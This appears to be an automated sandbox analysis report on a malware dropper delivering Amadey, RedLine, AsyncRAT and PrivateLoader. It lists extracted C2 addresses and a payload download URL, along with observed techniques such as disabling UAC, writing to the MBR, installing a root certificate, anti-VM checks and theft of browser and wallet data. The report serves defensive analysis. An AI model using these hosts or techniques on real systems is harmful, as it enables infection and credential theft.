amadey | 8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908

Resubmissions

27-06-2024 05:17

240627-fy7tcawhkr 10

02-06-2024 07:35

240602-jeng5sfa6t 10

02-06-2024 07:25

240602-h878zaeg9y 10

Analysis

max time kernel
86s
max time network
101s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
02-06-2024 07:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
Size

1.8MB
MD5

ac7237bfbd3e63efa1c29bf506a5833d
SHA1

1d0160a085b8aa1383cba4e6c0b789014cf3cfe6
SHA256

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908
SHA512

a3826b72be1815fbd782d9f6b20f732339d1540f378dd95c26e34b14cd60d57e9e613361b8c20da9f9fcead0c2ce84998eeb48ee3b5addc22b9374401a4c42eb
SSDEEP

24576:Q+SDM3ZxtLyy1EGw1wKO6+O3Osp8ljtbfEbuMJpd2QLXWoRu7CeE2oK:fSDMpxj1I1NZkjRfWuMJu6cGg

Score

10^/10

amadey asyncrat privateloader redline 49e482 fresh newbild bootkit discovery evasion execution infostealer loader persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://94.103.188.126/jerry/putty.zip

Extracted

Family

amadey

Version

4.21

Botnet

49e482

http://147.45.47.70

Attributes

install_dir
1b29d73536
install_file
axplont.exe
strings_key
4d31dd1a190d9879c21fac6d87dc0043
url_paths
/tr8nomy/index.php

rc4.plain

Extracted

Family

redline

Botnet

newbild

185.215.113.67:40960

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

Fresh

pepecasas123.net:4608

Mutex

AsyncMutex_5952

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

KcrOep5d9ZbonDmjbJKv3Q95.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	KcrOep5d9ZbonDmjbJKv3Q95.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000051001\newbild.exe	family_redline
behavioral1/memory/2460-1104-0x0000000000E30000-0x0000000000E80000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

President.pif

description pid process target process

PID 876 created 1196 876 President.pif Explorer.EXE

description	pid	process	target process
PID 876 created 1196	876	President.pif	Explorer.EXE

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

file300un.exevXaAyaPZGSQ7ID7cEXrEbQ7m.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	vXaAyaPZGSQ7ID7cEXrEbQ7m.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeaxplont.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXE

pid process

2792 powershell.exe
2516 powershell.exe
1572 powershell.exe
3808 powershell.exe
3800 powershell.exe
3824 powershell.exe
2296 powershell.EXE
Downloads MZ/PE file

pid	process
2792	powershell.exe
2516	powershell.exe
1572	powershell.exe
3808	powershell.exe
3800	powershell.exe
3824	powershell.exe
2296	powershell.EXE

Checks BIOS information in registry 2 TTPs 5 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeaxplont.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

KcrOep5d9ZbonDmjbJKv3Q95.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Control Panel\International\Geo\Nation	KcrOep5d9ZbonDmjbJKv3Q95.exe

Drops startup file 5 IoCs

Processes:

installutil.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hNSUxZxPD8uXhKp86h93UBNj.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xlDbihoyoYV0HoQorXbDMX4C.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a89zpzlfayW6wVn770QIXwWZ.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GYtMBDITCIMsRpQ9t0KjDh7T.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OlI3XLa3cwc3m4yvC2NMBCNh.bat	installutil.exe

Executes dropped EXE 21 IoCs

Processes:

axplont.exe33333.exelumma1234.exegold.exeswizzzz.exebuildjudit.exestub.exesmartsoftsignew.exefile300un.exe9a3efc.exenewbild.exePresident.pifvXaAyaPZGSQ7ID7cEXrEbQ7m.exeXd5ffINUWAexJgt1ZKuSRDbx.exeKcrOep5d9ZbonDmjbJKv3Q95.exeUxiJhIsJOXxDEdLQAJGja5uS.exeInstall.exeInstall.exePresident.pifekOKCbe.exeg5j793kwWdb5AI7JI1ot1gu7.exe

pid	process
2736	axplont.exe
2440	33333.exe
2416	lumma1234.exe
344	gold.exe
2016	swizzzz.exe
996	buildjudit.exe
2000	stub.exe
2400	smartsoftsignew.exe
3024	file300un.exe
2776	9a3efc.exe
2460	newbild.exe
876	President.pif
1676	vXaAyaPZGSQ7ID7cEXrEbQ7m.exe
496	Xd5ffINUWAexJgt1ZKuSRDbx.exe
684	KcrOep5d9ZbonDmjbJKv3Q95.exe
2240	UxiJhIsJOXxDEdLQAJGja5uS.exe
2020	Install.exe
340	Install.exe
4036	President.pif
4004	ekOKCbe.exe
3080	g5j793kwWdb5AI7JI1ot1gu7.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeaxplont.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Wine	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
Key opened	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Wine	axplont.exe

Loads dropped DLL 60 IoCs

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeaxplont.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exebuildjudit.exestub.exesmartsoftsignew.execmd.exeWerFault.exeinstallutil.exeXd5ffINUWAexJgt1ZKuSRDbx.exeWerFault.exeUxiJhIsJOXxDEdLQAJGja5uS.exeInstall.exeInstall.exe

pid	process
3068	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
2736	axplont.exe
2736	axplont.exe
2968	WerFault.exe
2968	WerFault.exe
2968	WerFault.exe
2736	axplont.exe
2736	axplont.exe
1548	WerFault.exe
1548	WerFault.exe
1548	WerFault.exe
2736	axplont.exe
2736	axplont.exe
1412	WerFault.exe
1412	WerFault.exe
1412	WerFault.exe
2736	axplont.exe
2736	axplont.exe
2780	WerFault.exe
2780	WerFault.exe
2780	WerFault.exe
2736	axplont.exe
996	buildjudit.exe
2000	stub.exe
2736	axplont.exe
2400	smartsoftsignew.exe
2400	smartsoftsignew.exe
2400	smartsoftsignew.exe
2400	smartsoftsignew.exe
2400	smartsoftsignew.exe
2736	axplont.exe
2736	axplont.exe
2736	axplont.exe
584	cmd.exe
1680	WerFault.exe
1680	WerFault.exe
1680	WerFault.exe
1680	WerFault.exe
1680	WerFault.exe
1012	installutil.exe
1012	installutil.exe
496	Xd5ffINUWAexJgt1ZKuSRDbx.exe
1012	installutil.exe
760	WerFault.exe
760	WerFault.exe
760	WerFault.exe
760	WerFault.exe
760	WerFault.exe
1012	installutil.exe
2240	UxiJhIsJOXxDEdLQAJGja5uS.exe
2240	UxiJhIsJOXxDEdLQAJGja5uS.exe
2240	UxiJhIsJOXxDEdLQAJGja5uS.exe
2240	UxiJhIsJOXxDEdLQAJGja5uS.exe
2020	Install.exe
2020	Install.exe
2020	Install.exe
2020	Install.exe
340	Install.exe
340	Install.exe
340	Install.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

file300un.exevXaAyaPZGSQ7ID7cEXrEbQ7m.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vXaAyaPZGSQ7ID7cEXrEbQ7m.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	vXaAyaPZGSQ7ID7cEXrEbQ7m.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service
T1102

Processes:

flow ioc

60 pastebin.com
62 pastebin.com
231 raw.githubusercontent.com
232 raw.githubusercontent.com
17 iplogger.com
19 iplogger.com
20 iplogger.com
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

108 ipinfo.io
109 ipinfo.io
379 ipinfo.io
380 ipinfo.io
104 api.myip.com
105 api.myip.com
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

Xd5ffINUWAexJgt1ZKuSRDbx.exe

description ioc process

File opened for modification \??\PhysicalDrive0 Xd5ffINUWAexJgt1ZKuSRDbx.exe

flow	ioc
60	pastebin.com
62	pastebin.com
231	raw.githubusercontent.com
232	raw.githubusercontent.com
17	iplogger.com
19	iplogger.com
20	iplogger.com

flow	ioc
108	ipinfo.io
109	ipinfo.io
379	ipinfo.io
380	ipinfo.io
104	api.myip.com
105	api.myip.com

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Xd5ffINUWAexJgt1ZKuSRDbx.exe

Drops file in System32 directory 7 IoCs

Processes:

KcrOep5d9ZbonDmjbJKv3Q95.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	KcrOep5d9ZbonDmjbJKv3Q95.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	KcrOep5d9ZbonDmjbJKv3Q95.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	KcrOep5d9ZbonDmjbJKv3Q95.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	KcrOep5d9ZbonDmjbJKv3Q95.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeaxplont.exe

pid process

3068 8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
2736 axplont.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

file300un.exevXaAyaPZGSQ7ID7cEXrEbQ7m.exePresident.pifg5j793kwWdb5AI7JI1ot1gu7.exe

description	pid	process	target process
PID 3024 set thread context of 1012	3024	file300un.exe	installutil.exe
PID 1676 set thread context of 2176	1676	vXaAyaPZGSQ7ID7cEXrEbQ7m.exe	AddInProcess32.exe
PID 876 set thread context of 4036	876	President.pif	President.pif
PID 3080 set thread context of 2948	3080	g5j793kwWdb5AI7JI1ot1gu7.exe	MSBuild.exe

Drops file in Windows directory 2 IoCs

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\axplont.job	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
File created	C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2968	2440	WerFault.exe	33333.exe
1548	2416	WerFault.exe	lumma1234.exe
1412	344	WerFault.exe	gold.exe
2780	2016	WerFault.exe	swizzzz.exe
3892	2980	WerFault.exe	34UkCCTcDg9lWuWQkt73.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1476 schtasks.exe
3404 schtasks.exe
4088 schtasks.exe
1812 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1716 tasklist.exe
2388 tasklist.exe

pid	process
1476	schtasks.exe
3404	schtasks.exe
4088	schtasks.exe
1812	schtasks.exe

pid	process
1716	tasklist.exe
2388	tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B3F90E31-20B2-11EF-99EB-F2F7F00EEB0D} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a23000000000200000000001066000000010000200000007a0018930645bb8726b9bd8895efac7cea1e340ecc6355ac7ebdec155f92f888000000000e8000000002000020000000842a1c74884b3faa11d7bf6556a7a27a25e8ca976c847c17ea2f49165554194c90000000394c20852919591ede0d58c8acea51864d043e9dc706dcdd1c12d0ad0782b02d72655beb68a21108356f2232323e1e034906f6a7056d06da36e86ced96e48ab3b4a3675ab09d98635a8fe24b48ad84ea3a5a0c0279862a64e779bf6a80c0b8ed4b90b9f76fc5080c0c621c41caf85c91911cf688d33ae6427f719b90a52dff7e925f069daf2d2136e9816334dd0079f840000000926bc09da5c5bec131c078c368b64895c349808170379dc2fe5d3d65db98e72bc181b228260be3a463474d8ccc5591197673beb291c954a69713500e17749991	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a230000000002000000000010660000000100002000000019590f1cf02cdbd820a73f4e9746da3dec637048405cc095cd7b6cd637b76982000000000e80000000020000200000009cbf1c0ff44651f1a6b0a29ea25e1a5403ff41671dc2dcec960a950afa82961b200000009c2594d8009891b3defcb103d31da79bc33186758d7c22b8d964ec720d13184140000000a866ef73cb31499b483482779c7b98faef364e26979e58f2ac09a69ad696a15384832e8ab0930074c7a47bf8a4ad9b3f37ef5dcc535e4a3d45c37b768d41850d	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70fb5089bfb4da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe

Modifies data under HKEY_USERS 10 IoCs

Processes:

ekOKCbe.exepowershell.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000c011f399bfb4da01	ekOKCbe.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ekOKCbe.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ekOKCbe.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	ekOKCbe.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 606c259abfb4da01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ekOKCbe.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

axplont.exeKcrOep5d9ZbonDmjbJKv3Q95.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca32